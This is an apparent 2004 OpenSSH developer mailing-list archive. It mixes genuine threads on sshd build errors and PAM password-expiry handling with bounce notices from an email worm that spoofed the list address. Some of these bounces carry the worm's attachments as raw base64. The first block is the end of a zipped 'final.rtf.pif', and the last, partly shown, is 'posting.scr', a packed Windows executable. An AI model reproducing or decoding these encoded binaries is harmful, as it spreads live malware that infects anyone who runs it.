AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAQAAA gAAAAAAAAAAAAAAAAAAAAgABAAAAWAAAgAIAAABwAACAAAAAAAAAAAAAAAAAAAABAGUAAACI AACAAAAAAAAAAAAAAAAAAAABAAcEAACgAAAAAAAAAAAAAAAAAAAAAAABAAcEAACwAAAAAAAA AAAAAAAAAAAAAAABAAcEAADAAAAA0JABAOgCAAAAAAAAAAAAALiTAQAoAQAAAAAAAAAAAADg lAEAIgAAAAAAAAAAAAAAKAAAACAAAABAAAAAAQAEAAAAAACAAgAAAAAAAAAAAAAAAAAAAAAA AMz//wBoV1gAAAAAAICAgAD///8AwMDAAP8AAAAA//8AvwAAAAAA/wAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAiIRIiIiIiIiIiIiIiIiIiIiE1VVVVVVVVVVVVVSUiIiIjRERERERERERE RERSUiIiI0RERERERFVUREVVUlIiIiNEiIiIREmZRESZlFJSIiIjRERERERElURESVRSUiIi I0SIiIiIRElVVVlUUlIiIiNEREREREREmZmZVFJSIiIjRIiIiIiIRElUSVRSUiIiI0RERERE RERElUlUUlIiIiNEiIiIiIiIRElZVFJSIiIjREREREREREREmVRSUiIiI0SIiIiIiIiIRElE UlIiIiNERERERERERERERFJSIiIjRIiIiIiIiIiIiERSUiIiI0REREREREREREREUlIiIiNE iIiIiIiIiIiIRFJSIiIjRERERERERERERERSUiIiI0QiIiIiRIiIiIhEUlIiIiNEOZJEQkRE RERERFJSIiIjRDIiIiJEiIiIiERSUiIiI0Q0QndyREREREREUlIiIiNEMiJ3ckSIiIiIRFJS IiIjRDRCd3JERERERERSUiIiI0Q0QmZiREREREREUlIiIiNENEJmYkRERERERFJSIiIjRDMy IiJERERERERSUiIiI0REREREREREREREUlIiIiNCRCRCRCRCRCRCRDJSIiIjQkQkQkQkQkQk QkQyUiIiIiQzQzQzQzQzQzQzQyIiIiIiIiIiIiIiIiIiIiIiIuAAAA/gAAAH4AAAB+AAAAfg AAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAA B+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB/gAAA// ////KAAAABAAAAAgAAAAAQAEAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIAA AACAgACAAAAAgACAAICAAADAwMAAgICAAAAA/wAA/wAAAP//AP8AAAD/AP8A//8AAP///wAA AAAAAAAAAAB3d3d3d3AAAP//n/+fcAAA//95mZ9wAAD0RPefn3AAAP///3mfcAAA9ERE959w AAD//////3AAAPRERERPcAAA//////9wAAD0RERET3AAAP//////cAAA//////9wAADw8PDw 8PAAAA+Pj4+PgAAAAAAAAAAAAMAHAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMA AMADAADAAwAAwAMAAMADAADAAwAAwAcAAOqvAAAAAAEAAgAgIBAAAQAEAOgCAAABABAQEAAB AAQAKAEAAAIAAAAAAAAA/1BLAQIUAAoAAAAAACmRezBiZMYWCWMAAAljAAANAAAAAAAAAAAA IAAAAAAAAABmaW5hbC5ydGYucGlmUEsFBgAAAAABAAEAOwAAADRjAAAAAA== ------=_NextPart_000_0009_00007DF3.00006C56-- From narendra at spiff.mt.att.com Sun Mar 28 05:10:48 2004 From: narendra at spiff.mt.att.com (Narendra Raavi) Date: Sat, 27 Mar 2004 14:10:48 -0500 Subject: Problems Compiling sshd - OpenSSH 3.8p1 on Tru64 UNIX V4.0F PK#7 (OSF) Message-ID: <20040327141048.A637@spiff.hr.att.com> I am trying to compile sshd 3.8p1 on Tru64 UNIX V4.0F Patch Level 7. Previously I've compiled the entire 3.6.1p2 distribution with no problems. The problem seems to occur when linking sshd. The linker is unable to find xcrypt and shadow_pw functions (openbsd-compat/*.c). The libopenbsd-compat seems to have built without errors. I configure as follows: CC=cc CFLAGS=-O LDFLAGS=-non_shared ./configure --prefix=/opt/ssh --with-prngd-socket =/var/run/egd-pool --with-ssl-dir=/opt/ssh --with-zlib=/opt/zlib cc -o sshd sshd.o auth-rhosts.o auth-passwd.o auth-rsa.o auth-rh-rsa.o sshpty.o sshlogin.o servconf.o serverloop.o uidswap.o auth.o auth1.o auth2.o auth-options.o session.o auth-chall.o auth2-chall.o groupaccess.o auth-skey.o auth-bsdauth.o auth2-hostbased.o auth2-kbdint.o auth2-none.o auth2-passwd.o auth2-pubkey.o monitor_mm.o monitor.o monitor_wrap.o monitor_fdpass.o kexdhs.o kexgexs.o auth-krb5.o auth2-gss.o gss-serv.o gss-serv-krb5.o loginrec.o auth-pam.o auth-shadow.o auth-sia.o md5crypt.o -L. -Lopenbsd-compat/ -L/opt/ssh/lib -L/opt/zlib/lib -non_shared -lssh -lopenbsd-compat -lcrypto -lrt -lz -lsecurity -ldb -lm -laud ld: Error: Undefined: xcrypt shadow_pw *** Exit 1 Stop. Any help debugging this would be appreciated. Thank you, N From mouring at etoh.eviladmin.org Sun Mar 28 05:34:00 2004 From: mouring at etoh.eviladmin.org (Ben Lindstrom) Date: Sat, 27 Mar 2004 13:34:00 -0600 (CST) Subject: Problems Compiling sshd - OpenSSH 3.8p1 on Tru64 UNIX V4.0F PK#7 (OSF) In-Reply-To: <20040327141048.A637@spiff.hr.att.com> Message-ID: We are aware of this and it has been solved. http://bugzilla.mindrot.org/show_bug.cgi?id=802 when 3.8.1p1 is released it will included this fix. - Ben On Sat, 27 Mar 2004, Narendra Raavi wrote: > > I am trying to compile sshd 3.8p1 on Tru64 UNIX V4.0F Patch Level 7. > Previously I've compiled the entire 3.6.1p2 distribution with no problems. > The problem seems to occur when linking sshd. The linker is unable to find > xcrypt and shadow_pw functions (openbsd-compat/*.c). The libopenbsd-compat > seems to have built without errors. I configure as follows: > > CC=cc CFLAGS=-O LDFLAGS=-non_shared ./configure --prefix=/opt/ssh > --with-prngd-socket =/var/run/egd-pool --with-ssl-dir=/opt/ssh > --with-zlib=/opt/zlib > > cc -o sshd sshd.o auth-rhosts.o auth-passwd.o auth-rsa.o auth-rh-rsa.o > sshpty.o sshlogin.o servconf.o serverloop.o uidswap.o auth.o auth1.o > auth2.o auth-options.o session.o auth-chall.o auth2-chall.o groupaccess.o > auth-skey.o auth-bsdauth.o auth2-hostbased.o auth2-kbdint.o auth2-none.o > auth2-passwd.o auth2-pubkey.o monitor_mm.o monitor.o monitor_wrap.o > monitor_fdpass.o kexdhs.o kexgexs.o auth-krb5.o auth2-gss.o gss-serv.o > gss-serv-krb5.o loginrec.o auth-pam.o auth-shadow.o auth-sia.o md5crypt.o > -L. -Lopenbsd-compat/ -L/opt/ssh/lib -L/opt/zlib/lib -non_shared -lssh > -lopenbsd-compat -lcrypto -lrt -lz -lsecurity -ldb -lm -laud > ld: > Error: Undefined: > xcrypt > shadow_pw > *** Exit 1 > Stop. > > > Any help debugging this would be appreciated. > > Thank you, > > N > > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > From rws at xx.lcs.mit.edu Sat Mar 27 11:52:46 2004 From: rws at xx.lcs.mit.edu (rws at xx.lcs.mit.edu) Date: Fri, 26 Mar 2004 21:52:46 -0300 Subject: Spamed? Message-ID: <20040327221310.0553327C188@shitei.mindrot.org> Are you a spammer? (I found your email on a spammer website!?!) From kumaresh_ind at gmx.net Sun Mar 28 16:39:13 2004 From: kumaresh_ind at gmx.net (Kumaresh) Date: Sun, 28 Mar 2004 12:09:13 +0530 Subject: Challenge Response authentication Message-ID: <024c01c4148f$6842e5b0$230110ac@kurco> Hi All, Is there a difference in 3.6 and 3.7 implemetaion of ChallengeResponse authentication? Also, what is the impact of setting UsePAM yes and no with respect to this authentication method and expiry passwords. Thanks, Kumaresh --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 From dtucker at zip.com.au Sun Mar 28 20:33:11 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sun, 28 Mar 2004 20:33:11 +1000 Subject: Challenge Response authentication In-Reply-To: <024c01c4148f$6842e5b0$230110ac@kurco> References: <024c01c4148f$6842e5b0$230110ac@kurco> Message-ID: <4066A9E7.3020205@zip.com.au> Kumaresh wrote: > Is there a difference in 3.6 and 3.7 implemetaion of ChallengeResponse > authentication? Challenge-response hasn't changed much, but the PAM challenge-response module was completely replaced between 3.6.1p2 and 3.7p1. > Also, what is the impact of setting UsePAM yes and no with respect to this > authentication method and expiry passwords. For 3.8p1 and up, when a user's password is expired and UsePAM=yes, if Protocol == 2 and keyboard-interactive auth force change via keyboard-interactive else if PrivSep == no force change via pam_chauthtok() at start of sesstion else force change via /usr/bin/passwd in session With PAM enabled, password expiry is checked for *all* authentication types (assuming PAM is configured to do so) since that test is done by pam_acct_mgmt(), which needs to be checked for all auth types. When UsePAM=no, password expiry is checked *only* for password authentication, and password change is always done via /usr/bin/passwd. Note that there is a bug when UsePAM=yes, the user's password is expired and challenge-response is not used (see bugzilla #808). (This is from memory, hopefully I got all the details right :-) -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From keiyamashita at super-r.net Sun Mar 28 22:25:47 2004 From: keiyamashita at super-r.net (Yamashita Kei) Date: Sun, 28 Mar 2004 21:25:47 +0900 Subject: (no subject) Message-ID: <000701c414bf$ccf4c980$dc04a8c0@yamashitb2xgc0> From MAILER-DAEMON at amaya.be.ubizen.com Mon Mar 29 18:50:38 2004 From: MAILER-DAEMON at amaya.be.ubizen.com (MAILER-DAEMON at amaya.be.ubizen.com) Date: 29 Mar 2004 08:50:38 -0000 Subject: failure notice Message-ID: <200403290850.i2T8ouEp017036@mail.be.ubizen.com> Hi. This is the qmail-send program at amaya.be.ubizen.com. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. : Sorry, no mailbox here by that name. (#5.1.1) --- Below this line is a copy of the message. Return-Path: Received: (qmail 10449 invoked from network); 29 Mar 2004 08:50:38 -0000 Received: from unknown (HELO mail.be.ubizen.com) (212.113.70.10) by amaya.be.ubizen.com with SMTP; 29 Mar 2004 08:50:31 -0000 Received: (from local) by mail.be.ubizen.com id i2T8oMR4016964 for ; Mon, 29 Mar 2004 10:50:22 +0200 Message-Id: <200403290850.i2T8oMR4016964 at mail.be.ubizen.com> Received: from UNKNOWN(195.6.68.65), claiming to be "ubizen.com" via SMTP by batty.netvision.be, id smtpd16901aaa; Mon Mar 29 08:49:48 2004 From: openssh-unix-dev at mindrot.org To: nicolas.appert at ubizen.com Subject: Status (nicolas.appert at ubizen.com) Date: Mon, 29 Mar 2004 10:48:55 +0200 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0016----=_NextPart_000_0016" X-Priority: 1 X-MSMail-Priority: High X-Sanitizer: In/BE X-Spam-Level: *********** X-Spam-Checker-Version: SpamAssassin 2.60 (1.212-2003-09-23-exp) on amaya.be.ubizen.com X-Spam-Flag: YES X-Spam-Report: * 1.3 X_PRIORITY_HIGH Sent with 'X-Priority' set to high * 0.2 NO_REAL_NAME From: does not include a real name * 0.5 X_MSMAIL_PRIORITY_HIGH Sent with 'X-Msmail-Priority' set to high * 0.1 RM_sl_LeadChar Subject contains word which begins with non-word character * 0.1 LG_4C_2V_3C BODY: Gibberish found? * 5.4 BAYES_99 BODY: Bayesian spam probability is 99 to 100% * [score: 0.9929] * 0.7 MSGID_FROM_MTA_HEADER Message-Id was added by a relay * 1.6 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE * 1.2 PRIORITY_NO_NAME Message has priority setting, but no X-Mailer * 0.5 MIME_BOUND_NEXTPART Spam tool pattern in MIME boundary * 0.1 CLICK_BELOW Asks you to click below X-Spam-Status: Yes, hits=11.6 required=5.0 tests=BAYES_99,CLICK_BELOW, LG_4C_2V_3C,MIME_BOUND_NEXTPART,MISSING_MIMEOLE,MSGID_FROM_MTA_HEADER, NO_REAL_NAME,PRIORITY_NO_NAME,RM_sl_LeadChar,X_MSMAIL_PRIORITY_HIGH, X_PRIORITY_HIGH autolearn=no version=2.60 This is a multi-part message in MIME format. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Mail Transaction Failed - This mail couldn't be converted ------------- failed message ------------- k$Ky1oo;_?X?N-ABKoN&N62CQlbW?s6Ctm~gh9|.abp XFuTl3IJ?))(tRJE)VAPrQ?vXlH#t4v7FuNoklS>,YlR-u_o 7vm9P0e1?:no_b&uilfH'2RP9n:,,qB+oNmV4woU?nfW( %25q|i'X|+olvLdw5S)P5K;ho>qCJSaR(tN'TxTaW$U6N#f *K|7 Received message has been attached. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="iso-8859-1"; name="DEFANGED-8710.txt" Content-Transfer-Encoding: 8bit Content-Disposition: inline; name="DEFANGED-8710.txt" This message has been modified for security reasons. The original attachment has been saved on the mail server, with the following file name: att-mail29638.pif-4067e359.UY The removed attachment's original name was: mail29638.pif Contacting the sender of the email you received to warn him/her is highly discouraged. For more information about why the attachment was removed, please click here http://sil.be.ubizen.com/contscan/ . ------=_NextPart_000_0016----=_NextPart_000_0016-- From f_mohr at yahoo.de Mon Mar 29 21:46:59 2004 From: f_mohr at yahoo.de (Frank Mohr) Date: Mon, 29 Mar 2004 13:46:59 +0200 Subject: Flags in pam_password_change_required() (auth-pam.c) Message-ID: <40680CB3.7280AA50@yahoo.de> Hi I just "stumbled" over the flags settings in pam_password_change_required(). As far as I looked over the OpenSSH code, setting/resetting the 2nd bit in those flags from auth-options.c whould only make sense if the flags are checked to be 0/1 in the remaining OpenSSH code. Frank From dtucker at zip.com.au Mon Mar 29 22:24:07 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Mon, 29 Mar 2004 22:24:07 +1000 Subject: Flags in pam_password_change_required() (auth-pam.c) In-Reply-To: <40680CB3.7280AA50@yahoo.de> References: <40680CB3.7280AA50@yahoo.de> Message-ID: <40681567.3080503@zip.com.au> Frank Mohr wrote: > I just "stumbled" over the flags settings in > pam_password_change_required(). > As far as I looked over the OpenSSH code, setting/resetting the 2nd bit > in those flags from auth-options.c whould only make sense if the flags > are checked to be 0/1 in the remaining OpenSSH code. Think: bit 1 = disabled by server config, bit 2 = disabled because password is expired and not yet changed. Bit 2 gets cleared if the user successfully changes the password, but if the server config denies it then the forwarding request will still be denied. The code that checks those flags looks like: if (!no_port_forwarding_flag) [...] -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From postmaster at estacio.br Mon Mar 29 22:42:51 2004 From: postmaster at estacio.br (postmaster at estacio.br) Date: Mon, 29 Mar 2004 09:42:51 -0300 (BRT) Subject: =?iso-8859-1?q?Mensagem_recusada=3A_arquivo_ou_assunto_n=E3o_per?= =?iso-8859-1?q?mitido?= Message-ID: <20040329124251.2042D38C7D@mail1.estacio.br> Foi encontrado nesta mensagem um tipo de arquivo ou assunto n?o permitido . From: openssh-unix-dev at mindrot.org To: filipo at estacio.br File(s): message.scr Matching filename: *.scr From MAILER-DAEMON at destro.sparkart.net Tue Mar 30 00:47:40 2004 From: MAILER-DAEMON at destro.sparkart.net (MAILER-DAEMON at destro.sparkart.net) Date: 29 Mar 2004 06:47:40 -0800 Subject: failure notice Message-ID: <20040329144745.F0E4227C187@shitei.mindrot.org> Hi. This is the qmail-send program at destro.sparkart.net. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. : Sorry, no mailbox here by that name. vpopmail (#5.1.1) --- Below this line is a copy of the message. Return-Path: Received: (qmail 24740 invoked from network); 29 Mar 2004 06:47:39 -0800 Received: from unknown (HELO linkinpark.com) (195.205.206.254) by destro.sparkart.net with SMTP; 29 Mar 2004 06:47:39 -0800 From: openssh-unix-dev at mindrot.org To: security at linkinpark.com Subject: something for you Date: Mon, 29 Mar 2004 16:47:37 +0200 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="21665162" --21665162 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit is that your name? --21665162 Content-Type: application/octet-stream; name="posting.scr" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="posting.scr" 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 